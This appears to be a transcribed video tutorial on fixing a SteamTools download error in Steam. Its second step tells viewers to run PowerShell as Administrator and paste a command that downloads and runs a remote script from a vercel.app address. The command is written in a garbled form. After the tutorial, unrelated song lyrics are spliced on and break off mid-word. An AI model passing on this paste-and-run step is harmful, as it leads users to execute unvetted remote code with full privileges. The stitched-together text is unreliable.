Hey, thanks for visit my channel. Today I'm going to show you how to fix the SteamTools no internet connection error while installing or updating a game on Steam. Let's start with the first fix. Step 1. Clear Steam download cache. Open Steam and go to Settings. Click Downloads from the left side. Now click Clear Download Cache and select Confirm. Steam will restart, so log back into your account and try downloading the game again. If the issue still exists, move to the next step. Step 2. Run the fix script. Click Start, type PowerShell, then right-click it and choose Run as Administrator. Now copy and paste the following command and press Enter. IRM https://luatools.vercel.app/manifests.ps1ix. When the script opens, type 1 and press Enter. Next, enter your game's Steam app ID. To find it, right-click the game in your Steam library, select Properties, then open the Updates tab. Copy the app ID and paste it into PowerShell. Press Enter and wait for the process to finish. Steam will restart automatically. Now launch Steam again and try downloading the game. The SteamTools no internet connection error should now be fixed.
Gave him a strong will, strong mind causes mayhem. We could change the world, change times, rearrange them. Staying on pace, running the race. Life is a chase, I don't want a place, I wanna be first. Work till it hurts, dehydrated thirst till I'm in a hearse. High ambitions in the right mind can take you so far. It's like you lived a few lifetimes. Take